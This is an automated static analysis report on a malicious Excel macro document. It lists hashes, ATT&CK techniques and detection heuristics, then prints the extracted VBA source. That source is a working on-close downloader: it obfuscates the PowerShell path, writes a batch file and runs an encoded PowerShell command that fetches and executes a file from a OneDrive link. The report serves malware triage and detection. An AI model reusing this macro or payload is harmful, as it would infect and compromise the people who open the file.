Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ad374191e1c30135…

MALICIOUS

Office (OLE)

10.5 KB First seen: 2021-10-12
MD5: a87b9a0ae2df38ec182763cfe3605c21 SHA-1: ec61bfcea0d717cb6e0f381ecdbd20def2bf5260 SHA-256: ad374191e1c301357be28b0c9c2edab53bd4b76cbb59c3e6241d636edb795b36
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The VBA macros within the document contain obfuscated PowerShell commands. Specifically, the macro reassembles the string 'JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBQAGgAcQBvAGUAbQB2AHcAZwB6AGgAcQBsAGUAZQBpAC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9ADYANgBDAEEAQgA0AEIAQwBFADIAMQA2AEIAQgA3ADkAJgByAGUAcwBpAGQAPQA2ADYAQwBBAEIANABCAEMARQAyADEANgBCAEIANwA5ACUAMgAxADIANwAxACYAYQB1AHQAaABrAGUAeQA9AEEASgBEADAAWQBtAGQAbQBrAE4AQwBuAGEAZgBjACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=" which decodes to a PowerShell command that downloads a file from 'https://onedrive.live.com/download?cid=66CAA4BCE216BB79&resid=66CAA4BCE216BB79%212121&authkye=AJD0YmdmkCnNafc' and executes it. The use of Shell() and the obfuscated PowerShell indicates a downloader functionality, likely delivered via spearphishing attachment.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5695 bytes
SHA-256: ecf5a302c4f3c20c32022c20d46134d61035d292a8b2fdfbe4b35d9a4074409e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim enc As String
enc = "JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBQAGgAcQBvAGUAbQB2AHcAZwB6AGgAcQBsAGUAZQBpAC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9ADYANgBDAEEAQgA0AEIAQwBFADIAMQA2AEIAQgA3ADkAJgByAGUAcwBpAGQAPQA2ADYAQwBBAEIANABCAEMARQAyADEANgBCAEIANwA5ACUAMgAxADIANwAxACYAYQB1AHQAaABrAGUAeQA9AEEASgBEADAAWQBtAGQAbQBrAE4AQwBuAGEAZgBjACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA="
call1 = "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe"
ActiveWorkbook.Save
batch = "Xvutvdwwwhufojbtme.bat"
Open batch For Output As #1
    Print #1, "start /MIN C:\Windo" + "ws\SysWOW64\" + call1 + " -win 1 -enc " + enc
    Close #1
    i = Shell(batch, 0)
End Sub

Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

End Sub

Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub


Private Sub Cellss()

End Sub

Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)

End Sub

Attribute VB_Name = "Start"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "1. Add"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "2. Fill"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "3. Split"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "4. Transpose"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "5. Sort & filter"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "6. Tables"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "7. Drop-downs"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
A
... (truncated)